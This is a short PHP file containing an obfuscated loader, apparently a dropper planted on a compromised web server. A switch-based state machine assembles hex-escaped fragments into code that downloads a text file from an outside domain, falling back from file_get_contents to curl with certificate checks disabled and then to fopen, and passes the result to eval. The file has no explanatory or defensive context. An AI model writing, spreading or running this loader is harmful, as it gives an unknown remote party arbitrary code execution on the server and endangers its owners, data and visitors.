<?php
$s=131396; $o=""; while(true) { switch($s) { case 628171: $o.="\x74\x27\x29\x29\x7b\x24\x68\x3d"; $s=141022; break;
case 598723: $o.="\x27\x3b\x24\x63\x3d\x40\x66\x69"; $s=639397; break;
case 907723: $o.="\x3b\x7d\x7d\x7d\x24\x63\x3f\x65"; $s=463694; break;
case 463694: $o.="\x76\x61\x6c\x28\x22\x3f\x3e\x24"; $s=422087; break;
case 131396: $o.="\x24\x75\x3d\x27\x68\x74\x74\x70"; $s=339746; break;
case 235871: $o.="\x6d\x6f\x6d\x68\x75\x62\x2e\x63"; $s=862281; break;
case 149457: $o.="\x63\x75\x72\x6c\x5f\x65\x78\x65"; $s=336744; break;
case 254043: $o.="\x24\x75\x29\x3b\x69\x66\x28\x21"; $s=400412; break;
case 813418: $o.="\x63\x75\x72\x6c\x5f\x69\x6e\x69"; $s=628171; break;
case 654419: $o.="\x28\x21\x66\x65\x6f\x66\x28\x24"; $s=831163; break;
case 230351: $o.="\x6c\x6f\x73\x65\x28\x24\x68\x29"; $s=907723; break;
case 698888: $o.="\x72\x6c\x5f\x73\x65\x74\x6f\x70"; $s=652696; break;
case 422087: $o.="\x63\x22\x29\x3a\x64\x69\x65\x28"; $s=621586; break;
case 569781: $o.="\x72\x27\x29\x3b\x69\x66\x28\x24"; $s=922841; break;
case 862281: $o.="\x6f\x6d\x2f\x38\x2e\x74\x78\x74"; $s=598723; break;
case 339746: $o.="\x73\x3a\x2f\x2f\x73\x74\x65\x70"; $s=235871; break;
case 621586: $o.="\x27\x46\x61\x69\x6c\x27\x29\x3b"; $s=319473; break;
case 924126: $o.="\x28\x24\x68\x29\x3b\x7d\x69\x66"; $s=664045; break;
case 664045: $o.="\x28\x21\x24\x63\x26\x26\x69\x6e"; $s=164843; break;
case 400412: $o.="\x24\x63\x29\x7b\x69\x66\x28\x66"; $s=287547; break;
case 924364: $o.="\x31\x30\x32\x34\x29\x3b\x66\x63"; $s=230351; break;
case 179991: $o.="\x33\x3d\x3e\x31\x2c\x36\x34\x3d"; $s=936623; break;
case 420764: $o.="\x24\x68\x2c\x5b\x31\x39\x39\x31"; $s=179991; break;
case 323216: $o.="\x74\x28\x24\x75\x29\x3b\x63\x75"; $s=698888; break;
case 922841: $o.="\x68\x29\x7b\x77\x68\x69\x6c\x65"; $s=654419; break;
case 319473: eval($o); break 2;
case 141022: $o.="\x63\x75\x72\x6c\x5f\x69\x6e\x69"; $s=323216; break;
case 773489: $o.="\x6c\x6c\x6f\x77\x5f\x75\x72\x6c"; $s=712054; break;
case 831163: $o.="\x68\x29\x29\x24\x63\x2e\x3d\x66"; $s=588651; break;
case 287547: $o.="\x75\x6e\x63\x74\x69\x6f\x6e\x5f"; $s=390339; break;
case 712054: $o.="\x5f\x66\x6f\x70\x65\x6e\x27\x29"; $s=675951; break;
case 652696: $o.="\x74\x5f\x61\x72\x72\x61\x79\x28"; $s=420764; break;
case 588651: $o.="\x72\x65\x61\x64\x28\x24\x68\x2c"; $s=924364; break;
case 936623: $o.="\x3e\x30\x5d\x29\x3b\x24\x63\x3d"; $s=149457; break;
case 336744: $o.="\x63\x28\x24\x68\x29\x3b\x63\x75"; $s=452223; break;
case 164843: $o.="\x69\x5f\x67\x65\x74\x28\x27\x61"; $s=773489; break;
case 560162: $o.="\x70\x65\x6e\x28\x24\x75\x2c\x27"; $s=569781; break;
case 390339: $o.="\x65\x78\x69\x73\x74\x73\x28\x27"; $s=813418; break;
case 639397: $o.="\x6c\x65\x5f\x67\x65\x74\x5f\x63"; $s=186526; break;
case 675951: $o.="\x29\x7b\x24\x68\x3d\x40\x66\x6f"; $s=560162; break;
case 186526: $o.="\x6f\x6e\x74\x65\x6e\x74\x73\x28"; $s=254043; break;
case 452223: $o.="\x72\x6c\x5f\x63\x6c\x6f\x73\x65"; $s=924126; break; } }
?>
